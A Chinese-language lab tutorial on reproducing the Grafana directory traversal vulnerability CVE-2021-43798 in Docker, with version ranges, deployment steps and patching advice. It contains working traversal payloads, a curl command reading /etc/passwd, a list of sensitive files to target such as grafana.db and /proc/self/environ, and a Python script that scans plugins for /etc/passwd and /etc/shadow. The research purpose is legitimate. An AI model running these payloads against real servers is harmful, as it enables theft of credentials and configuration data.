)
基于Docker的Grafana漏洞复现环境构建实战
在安全研究领域,快速搭建漏洞复现环境是每个技术人员的必修课。今天我们将聚焦Grafana目录遍历漏洞(CVE-2021-43798),通过Docker技术实现一键部署漏洞环境,帮助安全从业者高效学习漏洞原理与利用方式。不同于传统虚拟机方案,容器化部署具有隔离性好、资源占用低、环境可重复等显著优势,特别适合用于漏洞研究这类需要频繁重建环境的场景。
1. 漏洞背景与影响范围
Grafana作为流行的开源可视化监控平台,在8.0.0-beta1至8.3.0版本中存在目录遍历漏洞。攻击者通过构造特殊的URL路径,可以读取服务器上的任意文件,包括敏感配置文件、密码文件等。该漏洞的利用门槛较低,但危害性较高,CVSS评分达到7.5。
受影响版本具体包括:
- 8.0.0-beta1 到 8.0.6
- 8.1.0 到 8.1.7
- 8.2.0 到 8.2.6
- 8.3.0
提示:官方已在8.0.7、8.1.8、8.2.7和8.3.1版本中修复此漏洞,生产环境应立即升级。
漏洞利用的核心在于插件系统设计缺陷,攻击者无需认证即可通过以下形式访问敏感文件:
/public/plugins/{plugin_id}/../../../../etc/passwd2. Docker环境快速部署
2.1 选择正确的漏洞版本镜像
我们推荐使用官方历史版本镜像,确保环境纯净且易于复现。执行以下命令拉取存在漏洞的Grafana镜像:
docker pull grafana/grafana:8.2.6为方便实验,我们准备了一个预配置的docker-compose文件:
version: '3' services: vulnerable-grafana: image: grafana/grafana:8.2.6 ports: - "3000:3000" volumes: - grafana-storage:/var/lib/grafana volumes: grafana-storage:启动服务只需执行:
docker-compose up -d2.2 环境验证
服务启动后,访问http://localhost:3000应能看到Grafana登录界面。默认凭据为:
- 用户名:admin
- 密码:admin
注意:首次登录会要求修改密码,建议在实验环境中保持默认密码以便后续操作。
3. 漏洞利用实战
3.1 识别可用插件
漏洞利用的关键在于找到有效的插件ID。Grafana默认安装的插件包括:
| 插件类型 | 插件ID示例 |
|---|---|
| 数据源插件 | prometheus, mysql |
| 面板插件 | graph, table |
| 应用插件 | welcome, dashboard |
通过以下API可以获取完整插件列表:
http://localhost:3000/api/plugins3.2 构造恶意请求
使用curl测试目录遍历漏洞:
curl -v "http://localhost:3000/public/plugins/welcome/../../../../../../etc/passwd"成功响应将返回服务器上的/etc/passwd文件内容。常用敏感文件路径包括:
/etc/grafana/grafana.ini:主配置文件/var/lib/grafana/grafana.db:SQLite数据库/proc/self/environ:环境变量/root/.bash_history:命令历史记录
3.3 自动化检测脚本
为提高效率,可以编写简单的Python检测脚本:
import requests TARGET = "http://localhost:3000" PLUGINS = ["welcome", "prometheus", "graph"] FILES = ["/etc/passwd", "/etc/shadow"] for plugin in PLUGINS: for file in FILES: path = f"/public/plugins/{plugin}/../../../../..{file}" r = requests.get(TARGET + path) if r.status_code == 200 and "root:" in r.text: print(f"[+] Vulnerable! File leaked: {file}") print(r.text[:200] + "...") break4. 安全防护建议
4.1 修复方案
对于受影响的Grafana实例,应立即采取以下措施:
升级到安全版本:
docker pull grafana/grafana:8.3.1临时缓解措施(如无法立即升级):
- 配置反向代理过滤包含
/public/plugins/的异常路径 - 限制插件安装权限
- 配置反向代理过滤包含
4.2 加固建议
- 定期更新Grafana到最新稳定版
- 禁用不必要的插件
- 配置适当的文件系统权限
- 监控异常访问日志
5. 实验环境扩展
5.1 集成VULFOCUS靶场
为获得更真实的演练体验,可以部署集成VULFOCUS靶场环境:
git clone https://github.com/vulfocus/grafana-cve-2021-43798 cd grafana-cve-2021-43798 docker-compose up -d该环境模拟了真实攻击场景,包含flag获取挑战。
5.2 常见问题排查
问题1:请求返回404错误
- 检查插件ID是否正确
- 确认Grafana版本在受影响范围内
问题2:读取文件内容被截断
- 尝试使用不同路径深度(如增加../数量)
- 检查响应头中的Content-Length
在实际测试中,我们发现某些场景下需要尝试多次才能成功读取文件内容。建议保持耐心,系统性地测试不同插件和文件路径组合。
